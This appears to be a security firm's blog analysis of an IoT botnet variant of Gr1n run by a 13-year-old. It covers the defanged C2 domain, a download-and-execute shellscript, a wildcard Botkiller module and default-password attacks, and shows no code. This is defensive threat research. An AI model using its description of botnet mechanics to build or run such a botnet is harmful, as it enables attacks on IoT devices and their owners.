IoT Hackers Shift to the Dark Side

Introduction: The IoT threat landscape differs from conventional malware in terms of code sharing. While many windows malware authors are reluctant to share their source code (for free), IoT botnet source modules are available publicly on darknet hacking forums which makes the code reuse much easier. Most of IoT malware threats have been aided heavily by code sharing and reuse.

There has been a trend of late to share hacking tutorials and code within forums with a tag line “This is only for educational purposes”. Many hackers try this technique as they believe this can save them from legal action in some cases. We observed one such dump site Daddyhackingteam, which hosts a lot of malware source code and tutorials, has now shifted completely to the dark side as now it is also a command and control server for an IoT botnet variant of Gr1n.

Who is Daddyhackingteam?

The Daddyhackingteam website contains an archive of several IoT botnet source codes available publicly. While the homepage asks for registration to access the archives, it was noted by security researcher @JaromirHorejsi that the archives can be accessed directly without authentication.

Image 1: Archive list

Upon registering with the site, we see a message of “site under development” and the contact details of the site owner (which helped us to track his activities).

Press enter or click to view image in full size

Image 2: “Under Development”

Shift to the dark side

[Image courtesy of StarWars.com]

By tracking the listed Skype id, we observed that in the last few days, this person made three posts on a hackforum on questions related to set up a QBot of his own, and trying to get information to hack CCTVs to make his own botnet. These posts range from 30th June 2017 to 21st August 2017.

Image 4: Forum posts

It seems that he has implemented what he was looking for. On August 24th 2017, we observed in-the-wild samples where the same daddyhackingteam website known for containing archives is used as a callback to download a shellscript. This shellscript further downloads and runs botnet binaries from the same website.

In the figure below we see connections made to botnet(dot)daddyhackingteam(dot)com to retrieve the code to download and run its payload. As of writing these links were still live.

Image 5: Disassembly of retrieval code

Image 6: Script retrieved downloads and executes payload

Smaller but effective Botkiller

Like most of the popular IoT botnets, this sample also has a Botkiller module which will stop competitive IoT botnets that may be running from the victims’ system. While the list contains 67 names and is considerably smaller than the latest Botkiller list of 215 observed in QBot (https://blog.newskysecurity.com/agile-122bf2f4e2f3 ), it uses wildcards instead of exact name matching. Hence the list can be equally (or even more) effective despite being small.

Image 7: Botkiller module

Gr1n botnet similarities

Upon investigation, we noticed that a lot of code is inspired (or maybe directly copied) from the Gr1n botnet (whose code is available publicly on GitHub and other locations). Below we see two images, one from the Gr1n botnet source code and other from the decompiled malware binary. Both refer to the botnet command “VIEWPAGE” which creates a temporary file, performs WGet from the website provided, and redirects output to it. The name of the junk temporary file “yuagwduiagwdhg” as well as the code flow is very similar in both images.

Image 8: Gr1n botnet source code from GitHub

Image 9: Code inspired by Gr1n botnet

The attack vector is also similar to Gr1n, which is a simple default password guessing attack.

Malware author hunts for job

Interestingly, hacking forums was not the only place we saw the malware author’s Skype username. We observed that he uses the same Skype id for both malicious purposes and job hunting as shown below.

Image 10: Skype user name in other places

We found it either bold or immature of a malware author to use the same contact information for job hunting as well as for malicious activities. However, in his job search attempt, he mentions that he is 13 years old, which pretty much explains the dual use.

A conversation with the malware author

To get a closer prospective, we decided to go undercover and talk to the malware author himself based on the Skype address he provided everywhere. When we discussed about his botnet, he said he is just at 300 bots. Also, his CCTV botnet has not set started as nobody helped him on hacking forums.

Image 11: Conversation with “script kiddie”

He confirmed to us again that he is 13. When we told him that doing such illegal activities can land him in trouble, he was confident that he was immune because he was young. While various laws do have less harsh sentences for juveniles, in this case, we see this person taking advantage of that.

Conclusion

With tons of IoT botnet source code dumped publicly along with tutorials, its literally child’s play to set up a botnet by attacking IoT devices. While the steps to copy/paste, and set up the IoT botnet may be simple, the consequences can be equally devastating when such botnet armies try to activate a denial of service. NewSky Security IoT Halo detects this botnet at both proactive and reactive levels.

Ankit Anubhav

Principal Researcher, NewSky Security (@newskysecurity)